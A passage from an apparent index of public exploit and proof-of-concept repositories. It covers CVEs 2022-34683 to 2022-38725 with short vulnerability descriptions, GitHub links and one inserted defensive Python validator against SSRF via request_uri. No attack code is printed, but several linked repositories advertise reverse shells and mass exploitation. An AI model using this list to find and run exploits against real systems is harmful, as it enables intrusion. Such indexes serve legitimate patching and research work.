NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where a null-pointer dereference occurs, which may lead to denial of service.

- [gmh5225/CVE-2022-34683](https://github.com/gmh5225/CVE-2022-34683)

### CVE-2022-34715 (2022-08-09)

Windows Network File System Remote Code Execution Vulnerability

- [Starssgo/CVE-2022-34715-POC](https://github.com/Starssgo/CVE-2022-34715-POC)

### CVE-2022-34718 (2022-09-13)

Windows TCP/IP Remote Code Execution Vulnerability

- [SecLabResearchBV/CVE-2022-34718-PoC](https://github.com/SecLabResearchBV/CVE-2022-34718-PoC)

### CVE-2022-34753 (2022-07-13)

A CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could allow remote code execution as root when an attacker-controlled command is injected. Affected Products: SpaceLogic C-Bus Home Controller (5200WHC2), formerly known as C-Bus Wiser Home Controller MK2 (V1.31.460 and prior).

- [K3ysTr0K3R/CVE-2022-34753-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-34753-EXPLOIT)

### CVE-2022-34913 (2022-07-02)

md2roff 1.7 has a stack-based buffer overflow via a Markdown file containing a large number of consecutive characters to be processed. NOTE: the vendor's position is that the product is not intended for untrusted input.

- [Halcy0nic/CVE-2022-34913](https://github.com/Halcy0nic/CVE-2022-34913)

### CVE-2022-34918 (2022-07-04)

An issue was discovered in the Linux kernel through 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges, a different vulnerability than CVE-2022-32250. (The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access.) This can be fixed in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.

- [randorisec/CVE-2022-34918-LPE-PoC](https://github.com/randorisec/CVE-2022-34918-LPE-PoC)
- [merlinepedra25/CVE-2022-34918-LPE-PoC](https://github.com/merlinepedra25/CVE-2022-34918-LPE-PoC)
- [merlinepedra/CVE-2022-34918-LPE-PoC](https://github.com/merlinepedra/CVE-2022-34918-LPE-PoC)
- [linulinu/CVE-2022-34918](https://github.com/linulinu/CVE-2022-34918)
- [veritas501/CVE-2022-34918](https://github.com/veritas501/CVE-2022-34918)

### CVE-2022-34919 (2022-08-23)

The file upload wizard in Zengenti Contensis Classic before 15.2.1.79 does not correctly check that a user has authenticated. By uploading a crafted aspx file, it is possible to execute arbitrary commands.

- [ahajnik/CVE-2022-34919](https://github.com/ahajnik/CVE-2022-34919)

### CVE-2022-34961 (2022-07-25)

OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Users Timeline module.

- [bypazs/CVE-2022-34961](https://github.com/bypazs/CVE-2022-34961)

### CVE-2022-34962 (2022-07-25)

OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Group Timeline module.

- [bypazs/CVE-2022-34962](https://github.com/bypazs/CVE-2022-34962)

### CVE-2022-34963 (2022-07-25)

OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the News Feed module.

- [bypazs/CVE-2022-34963](https://github.com/bypazs/CVE-2022-34963)

### CVE-2022-34970 (2022-08-04)

Crow before 1.0+4 has a heap-based buffer overflow via the function qs_parse in query_string.h. On successful exploitation this vulnerability allows attackers to remotely execute arbitrary code in the context of the vulnerable service.

- [0xhebi/CVE-2022-34970](https://github.com/0xhebi/CVE-2022-34970)

### CVE-2022-35131 (2022-07-25)

Joplin v2.8.8 allows attackers to execute arbitrary commands via a crafted payload injected into note titles.

- [ly1g3/Joplin-CVE-2022-35131](https://github.com/ly1g3/Joplin-CVE-2022-35131)

### CVE-2022-35405 (2022-07-19)

Zoho ManageEngine Password Manager Pro before 12101 and PAM360 before 5510 are vulnerable to unauthenticated remote code execution. (This also affects ManageEngine Access Manager Plus before 4303 with authentication.)

- [viniciuspereiras/CVE-2022-35405](https://github.com/viniciuspereiras/CVE-2022-35405)

### CVE-2022-35411 (2022-07-08)

rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer: pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle.

- [fuzzlove/CVE-2022-35411](https://github.com/fuzzlove/CVE-2022-35411)

### CVE-2022-35416 (2022-07-11)

H3C SSL VPN through 2022-07-10 allows XSS via the svpnlang cookie in wnm/login/login.json.

- [safe3s/CVE-2022-35416](https://github.com/safe3s/CVE-2022-35416)

### CVE-2022-35500 (2022-11-23)

Amasty Blog 2.10.3 is vulnerable to Cross Site Scripting (XSS) via leave comment functionality.

- [afine-com/CVE-2022-35500](https://github.com/afine-com/CVE-2022-35500)

### CVE-2022-35501 (2022-11-23)

Stored Cross-site Scripting (XSS) exists in the Amasty Blog Pro 2.10.3 and 2.10.4 plugin for Magento 2 because of the duplicate post function.

- [afine-com/CVE-2022-35501](https://github.com/afine-com/CVE-2022-35501)

### CVE-2022-35513 (2022-09-07)

The Blink1Control2 application <= 2.2.7 uses weak password encryption and an insecure method of storage.

- [p1ckzi/CVE-2022-35513](https://github.com/p1ckzi/CVE-2022-35513)

### CVE-2022-35649 (2022-07-25)

This vulnerability in Moodle is due to improper input validation when parsing PostScript code. An omitted execution parameter results in a remote code execution risk for sites running Ghostscript versions older than 9.50. Successful exploitation may result in complete compromise of the vulnerable system.

- [antoinenguyen-09/CVE-2022-35649](https://github.com/antoinenguyen-09/CVE-2022-35649)

### CVE-2022-35698 (2022-10-14)

Adobe Commerce versions 2.4.4-p1 (and earlier) and 2.4.5 (and earlier) are affected by a Stored Cross-site Scripting vulnerability. Exploitation of this issue does not require user interaction and could result in a post-authentication arbitrary code execution.

- [EmicoEcommerce/Magento-APSB22-48-Security-Patches](https://github.com/EmicoEcommerce/Magento-APSB22-48-Security-Patches)

### CVE-2022-35737 (2022-08-03)

SQLite 1.0.12 through 3.39.x before 3.39.2 sometimes allows an array-bounds overflow if billions of bytes are used in a string argument to a C API.

- [gmh5225/CVE-2022-35737](https://github.com/gmh5225/CVE-2022-35737)
- [rvermeulen/codeql-cve-2022-35737](https://github.com/rvermeulen/codeql-cve-2022-35737)

### CVE-2022-35841 (2022-09-13)

Windows Enterprise App Management Service Remote Code Execution Vulnerability

- [Wack0/CVE-2022-35841](https://github.com/Wack0/CVE-2022-35841)

### CVE-2022-35899 (2022-07-21)

There is an unquoted service path in ASUSTeK Aura Ready Game SDK service (GameSDK.exe) 1.0.0.4. This might allow a local user to escalate privileges by creating a %PROGRAMFILES(X86)%\ASUS\GameSDK.exe file.

- [angelopioamirante/CVE-2022-35899](https://github.com/angelopioamirante/CVE-2022-35899)

### CVE-2022-35914 (2022-09-19)

/vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection.

- [cosad3s/CVE-2022-35914-poc](https://github.com/cosad3s/CVE-2022-35914-poc)
- [Lzer0Kx01/CVE-2022-35914](https://github.com/Lzer0Kx01/CVE-2022-35914)
- [6E6L6F/CVE-2022-35914](https://github.com/6E6L6F/CVE-2022-35914)
- [0xGabe/CVE-2022-35914](https://github.com/0xGabe/CVE-2022-35914)
- [Johnermac/CVE-2022-35914](https://github.com/Johnermac/CVE-2022-35914)
- [senderend/CVE-2022-35914](https://github.com/senderend/CVE-2022-35914)
- [noxlumens/CVE-2022-35914_poc](https://github.com/noxlumens/CVE-2022-35914_poc)
- [btar1gan/exploit_CVE-2022-35914](https://github.com/btar1gan/exploit_CVE-2022-35914)

### CVE-2022-35919 (2022-08-01)

MinIO is a High Performance Object Storage released under GNU Affero General Public License v3.0. In affected versions, any 'admin' user authorized for `admin:ServerUpdate` can trigger an error whose response returns the content of the requested path, so any file readable by the MinIO process can be read. Users are advised to upgrade. Users unable to upgrade may disable the ServerUpdate API by denying the `admin:ServerUpdate` action for admin users via IAM policies.

- [ifulxploit/Minio-Security-Vulnerability-Checker](https://github.com/ifulxploit/Minio-Security-Vulnerability-Checker)

### CVE-2022-36067 (2022-09-06)

vm2 is a sandbox that can run untrusted code with an allowlist of Node's built-in modules. In versions prior to 3.9.11, a threat actor can bypass the sandbox protections to gain remote code execution on the host running the sandbox. This vulnerability was patched in version 3.9.11 of vm2. There are no known workarounds.

- [0x1nsomnia/CVE-2022-36067-vm2-POC-webapp](https://github.com/0x1nsomnia/CVE-2022-36067-vm2-POC-webapp)
- [Prathamrajgor/Exploit-For-CVE-2022-36067](https://github.com/Prathamrajgor/Exploit-For-CVE-2022-36067)

### CVE-2022-36162
- [MaherAzzouzi/CVE-2022-36162](https://github.com/MaherAzzouzi/CVE-2022-36162)

### CVE-2022-36163
- [MaherAzzouzi/CVE-2022-36163](https://github.com/MaherAzzouzi/CVE-2022-36163)

### CVE-2022-36193 (2022-11-28)

SQL injection in School Management System 1.0 allows remote attackers to modify or delete data, causing persistent changes to the application's content or behavior by using malicious SQL queries.

- [G37SYS73M/CVE-2022-36193](https://github.com/G37SYS73M/CVE-2022-36193)

### CVE-2022-36200 (2022-08-29)

In the FiberHome VDSL2 Modem HG150-Ub_V3.0, admin credentials are submitted in the URL, where they can be logged or sniffed.

- [afaq1337/CVE-2022-36200](https://github.com/afaq1337/CVE-2022-36200)

### CVE-2022-36231 (2023-02-23)

pdf_info 0.5.3 is vulnerable to command execution because the Ruby code runs external commands through shell backticks instead of Open3.

- [affix/CVE-2022-36231](https://github.com/affix/CVE-2022-36231)

### CVE-2022-36234 (2022-07-28)

SimpleNetwork TCP Server commit 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496 was discovered to contain a double free vulnerability which is exploited via crafted TCP packets.

- [Halcy0nic/CVE-2022-36234](https://github.com/Halcy0nic/CVE-2022-36234)

### CVE-2022-36267 (2022-08-08)

Airspan AirSpot 5410 version 0.3.4.1-4 and below contains an unauthenticated remote command injection vulnerability. The ping functionality can be invoked without user authentication by a crafted HTTP request that injects code into one of its parameters, allowing remote code execution. The vulnerability is reached through the binary /home/www/cgi-bin/diagnostics.cgi, which accepts unauthenticated requests and unsanitized data. As a result, a malicious actor can craft a specific request and interact remotely with the device.

- [0xNslabs/CVE-2022-36267-PoC](https://github.com/0xNslabs/CVE-2022-36267-PoC)

### CVE-2022-36271 (2022-09-07)

Outbyte PC Repair Installation File 1.7.112.7856 is vulnerable to DLL hijacking. iertutil.dll is missing, so an attacker can plant a malicious DLL with the same name and gain admin privileges.

- [SaumyajeetDas/POC-of-CVE-2022-36271](https://github.com/SaumyajeetDas/POC-of-CVE-2022-36271)

### CVE-2022-36432 (2022-11-17)

The Preview functionality in the Amasty Blog Pro 2.10.3 plugin for Magento 2 uses eval unsafely. This allows attackers to perform Cross-site Scripting attacks on admin panel users by manipulating the generated preview application response.

- [afine-com/CVE-2022-36432](https://github.com/afine-com/CVE-2022-36432)

### CVE-2022-36433 (2022-11-29)

The blog-post creation functionality in the Amasty Blog Pro 2.10.3 plugin for Magento 2 allows injection of JavaScript code in the short_content and full_content fields, leading to XSS attacks against admin panel users via posts/preview or posts/save.

- [afine-com/CVE-2022-36433](https://github.com/afine-com/CVE-2022-36433)

### CVE-2022-36446 (2022-07-25)

software/apt-lib.pl in Webmin before 1.997 lacks HTML escaping for a UI command.

- [p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE](https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE)
- [emirpolatt/CVE-2022-36446](https://github.com/emirpolatt/CVE-2022-36446)
- [Kang3639/CVE-2022-36446](https://github.com/Kang3639/CVE-2022-36446)

### CVE-2022-36532 (2022-09-16)

Bolt CMS contains a vulnerability in version 5.1.12 and below that allows an authenticated user with the ROLE_EDITOR privileges to upload and rename a malicious file to achieve remote code execution.

- [lutrasecurity/CVE-2022-36532](https://github.com/lutrasecurity/CVE-2022-36532)

### CVE-2022-36537 (2022-08-26)

ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 allows attackers to access sensitive information via a crafted POST request sent to the component AuUploader.

- [agnihackers/CVE-2022-36537-EXPLOIT](https://github.com/agnihackers/CVE-2022-36537-EXPLOIT)
- [Malwareman007/CVE-2022-36537](https://github.com/Malwareman007/CVE-2022-36537)

### CVE-2022-36539 (2022-09-07)

WeDayCare B.V Ouderapp before v1.1.22 allows attackers to alter the ID value within intercepted calls to gain access to data of other parents and children.

- [Fopje/CVE-2022-36539](https://github.com/Fopje/CVE-2022-36539)

### CVE-2022-36553 (2022-08-29)

Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.

- [0xNslabs/CVE-2022-36553-PoC](https://github.com/0xNslabs/CVE-2022-36553-PoC)

### CVE-2022-36663 (2022-09-06)

Gluu Oxauth before v4.4.1 allows attackers to execute blind SSRF (Server-Side Request Forgery) attacks via a crafted request_uri parameter.

- [aqeisi/CVE-2022-36663-PoC](https://github.com/aqeisi/CVE-2022-36663-PoC)
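A server-side validator for the `request_uri` fetch that this SSRF abuses, as an added Python example; it is not Gluu oxAuth code. It assumes the server keeps a per-client set of pre-registered request_uris (which OpenID Connect client registration allows) and resolves host names before fetching; DNS is stubbed with constructed answers so the example runs offline:

```python
"""Validate an OAuth/OpenID Connect request_uri before the server fetches it.

Added example, not Gluu oxAuth code. The client registrations and the DNS
answers are constructed; swap resolve() for socket.getaddrinfo in production.
"""
import ipaddress
from urllib.parse import urlsplit


class RequestUriRejected(Exception):
    pass


# Constructed client registrations: the exact request_uri values each
# client registered at onboarding. Anything else is refused outright.
REGISTERED_REQUEST_URIS = {
    "client-a": {
        "https://rp.example.com/requests/login.jwt",
        # Registered, but its host resolves internally (see DNS check).
        "https://internal.example.com/requests/login.jwt",
    },
}

# Constructed DNS answers so the example is deterministic and offline.
FAKE_DNS = {
    "rp.example.com": ["93.184.216.34"],
    "internal.example.com": ["10.0.0.12"],
    "localtest.me": ["127.0.0.1"],
}


def resolve(host: str):
    """Stand-in for a real resolver."""
    return FAKE_DNS.get(host, [])


def is_public_ip(addr: str) -> bool:
    # is_global is False for private, loopback, link-local, multicast,
    # reserved and documentation ranges.
    return ipaddress.ip_address(addr).is_global


def validate_request_uri(client_id: str, request_uri: str) -> str:
    """Return request_uri if it is safe to fetch, else raise RequestUriRejected."""
    parts = urlsplit(request_uri)
    if parts.scheme != "https":
        raise RequestUriRejected("scheme must be https")
    if parts.username is not None or parts.password is not None:
        raise RequestUriRejected("userinfo not allowed")
    if not parts.hostname:
        raise RequestUriRejected("missing host")
    # Exact-match allowlist: no parsing tricks get past a string compare.
    if request_uri not in REGISTERED_REQUEST_URIS.get(client_id, set()):
        raise RequestUriRejected("request_uri not registered for this client")
    # Defence in depth: a registered host that resolves to a non-public
    # address (misregistration, DNS rebinding) is still refused.
    addrs = resolve(parts.hostname)
    if not addrs or not all(is_public_ip(a) for a in addrs):
        raise RequestUriRejected("host resolves to a non-public address")
    return request_uri


def is_safe_request_uri(client_id: str, request_uri: str) -> bool:
    try:
        validate_request_uri(client_id, request_uri)
        return True
    except RequestUriRejected:
        return False


if __name__ == "__main__":
    for uri in ("https://rp.example.com/requests/login.jwt",
                "https://internal.example.com/requests/login.jwt",
                "https://localtest.me/requests/login.jwt"):
        print(uri, "->", is_safe_request_uri("client-a", uri))
```

The resolution check only helps if the fetch then connects to the addresses that were checked; resolving once for validation and again inside the HTTP client reopens the rebinding window, so pin the checked address when making the request.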

### CVE-2022-36752 (2022-07-28)

png2webp v1.0.4 was discovered to contain an out-of-bounds write via the function w2p. This vulnerability is exploitable via a crafted png file.

- [Halcy0nic/CVE-2022-36752](https://github.com/Halcy0nic/CVE-2022-36752)

### CVE-2022-36779 (2022-09-13)

PROSCEND / ADVICE Ltd. industrial 4G/5G cellular routers (with GPS) contain an unauthenticated OS command injection vulnerability. Affected models: Proscend M330-w, M33-W5, M350-5G, M350-W5G, M350-6, M350-W6, M301-G, M301-GW, and ADVICE ICR 111WG. References: https://www.proscend.com/en/category/industrial-Cellular-Router/industrial-Cellular-Router.html and https://cdn.shopify.com/s/files/1/0036/9413/3297/files/ADVICE_Industrial_4G_LTE_Cellular_Router_ICR111WG.pdf?v=1620814301

- [rootDR/CVE-2022-36779](https://github.com/rootDR/CVE-2022-36779)
- [EmadYaY/CVE-2022-36779](https://github.com/EmadYaY/CVE-2022-36779)

### CVE-2022-36804 (2022-08-25)

Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allow remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.

- [notdls/CVE-2022-36804](https://github.com/notdls/CVE-2022-36804)
- [notxesh/CVE-2022-36804-PoC](https://github.com/notxesh/CVE-2022-36804-PoC)
- [JRandomSage/CVE-2022-36804-MASS-RCE](https://github.com/JRandomSage/CVE-2022-36804-MASS-RCE)
- [benjaminhays/CVE-2022-36804-PoC-Exploit](https://github.com/benjaminhays/CVE-2022-36804-PoC-Exploit)
- [Vulnmachines/bitbucket-cve-2022-36804](https://github.com/Vulnmachines/bitbucket-cve-2022-36804)
- [kljunowsky/CVE-2022-36804-POC](https://github.com/kljunowsky/CVE-2022-36804-POC)
- [Chocapikk/CVE-2022-36804-ReverseShell](https://github.com/Chocapikk/CVE-2022-36804-ReverseShell)
- [khal4n1/CVE-2022-36804](https://github.com/khal4n1/CVE-2022-36804)
- [0xEleven/CVE-2022-36804-ReverseShell](https://github.com/0xEleven/CVE-2022-36804-ReverseShell)
- [tahtaciburak/cve-2022-36804](https://github.com/tahtaciburak/cve-2022-36804)
- [Inplex-sys/CVE-2022-36804](https://github.com/Inplex-sys/CVE-2022-36804)
- [ColdFusionX/CVE-2022-36804](https://github.com/ColdFusionX/CVE-2022-36804)
- [devengpk/CVE-2022-36804](https://github.com/devengpk/CVE-2022-36804)
- [walnutsecurity/cve-2022-36804](https://github.com/walnutsecurity/cve-2022-36804)
- [imbas007/Atlassian-Bitbucket-CVE-2022-36804](https://github.com/imbas007/Atlassian-Bitbucket-CVE-2022-36804)

### CVE-2022-36944 (2022-09-23)

Scala 2.13.x before 2.13.9 has a Java deserialization chain in its JAR file. On its own, it cannot be exploited. There is only a risk in conjunction with Java object deserialization within an application. In such situations, it allows attackers to erase contents of arbitrary files, make network connections, or possibly run arbitrary code (specifically, Function0 functions) via a gadget chain.

- [yarocher/lazylist-cve-poc](https://github.com/yarocher/lazylist-cve-poc)

### CVE-2022-36946 (2022-07-27)

nfqnl_mangle in net/netfilter/nfnetlink_queue.c in the Linux kernel through 5.18.14 allows remote attackers to cause a denial of service (panic) because, in the case of an nf_queue verdict with a one-byte nfta_payload attribute, an skb_pull can encounter a negative skb->len.

- [Pwnzer0tt1/CVE-2022-36946](https://github.com/Pwnzer0tt1/CVE-2022-36946)
- [Satheesh575555/linux-4.19.72_CVE-2022-36946](https://github.com/Satheesh575555/linux-4.19.72_CVE-2022-36946)

### CVE-2022-37017 (2022-12-01)

Symantec Endpoint Protection (Windows) agent, prior to 14.3 RU6/14.3 RU5 Patch 1, may be susceptible to a Security Control Bypass vulnerability, which is a type of issue that can potentially allow a threat actor to circumvent existing security controls. This CVE applies narrowly to the Client User Interface Password protection and Policy Import/Export Password protection, if it has been enabled.

- [apeppels/CVE-2022-37017](https://github.com/apeppels/CVE-2022-37017)

### CVE-2022-37032 (2022-09-19)

An out-of-bounds read in the BGP daemon of FRRouting FRR before 8.4 may lead to a segmentation fault and denial of service. This occurs in bgp_capability_msg_parse in bgpd/bgp_packet.c.

- [spwpun/CVE-2022-37032](https://github.com/spwpun/CVE-2022-37032)

### CVE-2022-37042 (2022-08-11)

Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.

- [GreyNoise-Intelligence/Zimbra_CVE-2022-37042-_CVE-2022-27925](https://github.com/GreyNoise-Intelligence/Zimbra_CVE-2022-37042-_CVE-2022-27925)
- [aels/CVE-2022-37042](https://github.com/aels/CVE-2022-37042)
- [0xf4n9x/CVE-2022-37042](https://github.com/0xf4n9x/CVE-2022-37042)

### CVE-2022-37177 (2022-08-29)

HireVue Hiring Platform V1.0 suffers from Use of a Broken or Risky Cryptographic Algorithm. NOTE: this is disputed by the vendor for multiple reasons, e.g., it is inconsistent with CVE ID assignment rules for cloud services, and no product with version V1.0 exists. Furthermore, the rail-fence cipher has been removed, and TLS 1.2 is now used for encryption.

- [JC175/CVE-2022-37177](https://github.com/JC175/CVE-2022-37177)

### CVE-2022-37201 (2022-09-15)

JFinal CMS 5.1.0 is vulnerable to SQL Injection.

- [AgainstTheLight/CVE-2022-37201](https://github.com/AgainstTheLight/CVE-2022-37201)

### CVE-2022-37202 (2022-10-26)

JFinal CMS 5.1.0 is vulnerable to SQL Injection via /admin/advicefeedback/list

- [AgainstTheLight/CVE-2022-37202](https://github.com/AgainstTheLight/CVE-2022-37202)

### CVE-2022-37203 (2022-09-19)

JFinal CMS 5.1.0 is vulnerable to SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection.

- [AgainstTheLight/CVE-2022-37203](https://github.com/AgainstTheLight/CVE-2022-37203)

### CVE-2022-37204 (2022-09-20)

JFinal CMS 5.1.0 is vulnerable to SQL Injection.

- [AgainstTheLight/CVE-2022-37204](https://github.com/AgainstTheLight/CVE-2022-37204)

### CVE-2022-37205 (2022-09-20)

JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection.

- [AgainstTheLight/CVE-2022-37205](https://github.com/AgainstTheLight/CVE-2022-37205)

### CVE-2022-37206
- [AgainstTheLight/CVE-2022-37206](https://github.com/AgainstTheLight/CVE-2022-37206)

### CVE-2022-37207 (2022-09-15)

JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection.

- [AgainstTheLight/CVE-2022-37207](https://github.com/AgainstTheLight/CVE-2022-37207)

### CVE-2022-37208 (2022-10-13)

JFinal CMS 5.1.0 is vulnerable to SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection.

- [AgainstTheLight/CVE-2022-37208](https://github.com/AgainstTheLight/CVE-2022-37208)

### CVE-2022-37209 (2022-09-27)

JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection.

- [AgainstTheLight/CVE-2022-37209](https://github.com/AgainstTheLight/CVE-2022-37209)

### CVE-2022-37210
- [AgainstTheLight/CVE-2022-37210](https://github.com/AgainstTheLight/CVE-2022-37210)

### CVE-2022-37298 (2022-10-20)

Shinken Solutions Shinken Monitoring Version 2.4.3 affected is vulnerable to Incorrect Access Control. The SafeUnpickler class found in shinken/safepickle.py implements a weak authentication scheme when unserializing objects passed from monitoring nodes to the Shinken monitoring server.

- [dbyio/cve-2022-37298](https://github.com/dbyio/cve-2022-37298)

### CVE-2022-37332 (2022-11-21)

A use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader, version 12.0.1.12430. A specially-crafted PDF document can trigger the reuse of previously freed memory via misusing media player API, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted, malicious site if the browser plugin extension is enabled.

- [SpiralBL0CK/CVE-2022-37332-RCE-](https://github.com/SpiralBL0CK/CVE-2022-37332-RCE-)

### CVE-2022-37434 (2022-08-05)

zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).

- [xen0bit/CVE-2022-37434_poc](https://github.com/xen0bit/CVE-2022-37434_poc)
- [Trinadh465/external_zlib_android-6.0.1_r22_CVE-2022-37434](https://github.com/Trinadh465/external_zlib_android-6.0.1_r22_CVE-2022-37434)
- [Trinadh465/external_zlib_CVE-2022-37434](https://github.com/Trinadh465/external_zlib_CVE-2022-37434)

### CVE-2022-37703 (2022-09-13)

In Amanda 3.5.1, an information leak vulnerability was found in the calcsize SUID binary. An attacker can abuse this vulnerability to know if a directory exists or not anywhere in the fs. The binary will use `opendir()` as root directly without checking the path, letting the attacker provide an arbitrary path.

- [MaherAzzouzi/CVE-2022-37703](https://github.com/MaherAzzouzi/CVE-2022-37703)

### CVE-2022-37704 (2023-04-16)

Amanda 3.5.1 allows privilege escalation from the regular user backup to root. The SUID binary located at /lib/amanda/rundump will execute /usr/sbin/dump as root with controlled arguments from the attacker which may lead to escalation of privileges, denial of service, and information disclosure.

- [MaherAzzouzi/CVE-2022-37704](https://github.com/MaherAzzouzi/CVE-2022-37704)

### CVE-2022-37705 (2023-04-16)

A privilege escalation flaw was found in Amanda 3.5.1 in which the backup user can acquire root privileges. The vulnerable component is the runtar SUID program, which is a wrapper to run /usr/bin/tar with specific arguments that are controllable by the attacker. This program mishandles the arguments passed to tar binary (it expects that the argument name and value are separated with a space; however, separating them with an equals sign is also supported),

- [MaherAzzouzi/CVE-2022-37705](https://github.com/MaherAzzouzi/CVE-2022-37705)

### CVE-2022-37706 (2022-12-25)

enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring.

- [MaherAzzouzi/CVE-2022-37706-LPE-exploit](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit)
- [ECU-10525611-Xander/CVE-2022-37706](https://github.com/ECU-10525611-Xander/CVE-2022-37706)
- [junnythemarksman/CVE-2022-37706](https://github.com/junnythemarksman/CVE-2022-37706)
- [AleksPwn/CVE-2022-37706](https://github.com/AleksPwn/CVE-2022-37706)
- [TACTICAL-HACK/CVE-2022-37706-SUID](https://github.com/TACTICAL-HACK/CVE-2022-37706-SUID)
- [sanan2004/CVE-2022-37706](https://github.com/sanan2004/CVE-2022-37706)
- [KaoXx/CVE-2022-37706](https://github.com/KaoXx/CVE-2022-37706)

### CVE-2022-37708
- [thekevinday/docker_lightman_exploit](https://github.com/thekevinday/docker_lightman_exploit)

### CVE-2022-37969 (2022-09-13)

Windows Common Log File System Driver Elevation of Privilege Vulnerability

- [fortra/CVE-2022-37969](https://github.com/fortra/CVE-2022-37969)

### CVE-2022-38029 (2022-10-11)

Windows ALPC Elevation of Privilege Vulnerability

- [SpiralBL0CK/SIDECHANNEL-CVE-2022-38029](https://github.com/SpiralBL0CK/SIDECHANNEL-CVE-2022-38029)

### CVE-2022-38181 (2022-10-25)

The Arm Mali GPU kernel driver allows unprivileged users to access freed memory because GPU memory operations are mishandled. This affects Bifrost r0p0 through r38p1, and r39p0; Valhall r19p0 through r38p1, and r39p0; and Midgard r4p0 through r32p0.

- [Pro-me3us/CVE_2022_38181_Raven](https://github.com/Pro-me3us/CVE_2022_38181_Raven)
- [Pro-me3us/CVE_2022_38181_Gazelle](https://github.com/Pro-me3us/CVE_2022_38181_Gazelle)
- [R0rt1z2/CVE-2022-38181](https://github.com/R0rt1z2/CVE-2022-38181)

### CVE-2022-38374 (2022-11-02)

An improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiADC 7.0.0 - 7.0.2 and 6.2.0 - 6.2.4 allows an attacker to execute unauthorized code or commands via the URL and User fields observed in the traffic and event log views.

- [azhurtanov/CVE-2022-38374](https://github.com/azhurtanov/CVE-2022-38374)
- [M4fiaB0y/CVE-2022-38374](https://github.com/M4fiaB0y/CVE-2022-38374)

### CVE-2022-38553 (2022-09-26)

Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter.

- [4websecurity/CVE-2022-38553](https://github.com/4websecurity/CVE-2022-38553)

### CVE-2022-38577 (2022-09-19)

ProcessMaker before v3.5.4 was discovered to contain insecure permissions in the user profile page. This vulnerability allows attackers to escalate normal users to Administrators.

- [sornram9254/CVE-2022-38577-Processmaker](https://github.com/sornram9254/CVE-2022-38577-Processmaker)

### CVE-2022-38601
- [jet-pentest/CVE-2022-38601](https://github.com/jet-pentest/CVE-2022-38601)

### CVE-2022-38604 (2023-04-11)

Wacom Driver 6.3.46-1 for Windows and lower was discovered to contain an arbitrary file deletion vulnerability.

- [LucaBarile/CVE-2022-38604](https://github.com/LucaBarile/CVE-2022-38604)

### CVE-2022-38691
- [TomKing062/CVE-2022-38691_38692](https://github.com/TomKing062/CVE-2022-38691_38692)

### CVE-2022-38694
- [TomKing062/CVE-2022-38694_unlock_bootloader](https://github.com/TomKing062/CVE-2022-38694_unlock_bootloader)
- [TheGammaSqueeze/Bootloader_Unlock_Anbernic_T820](https://github.com/TheGammaSqueeze/Bootloader_Unlock_Anbernic_T820)

### CVE-2022-38725 (2023-01-23)

An integer overflow in the RFC3164 parser in One Identity syslog-ng 3.0 through 3.37 allows remote attackers to cause a Denial of Service via crafted syslog input that is mishandled by the tcp or network function. syslog-ng Premium Edition 7.0.30 and syslog-ng Store Box 6.10.0 are also affected.

- [wdahlenburg/CVE-2022-38725](https://github.com/wdahlenburg/CVE-2022-38725)

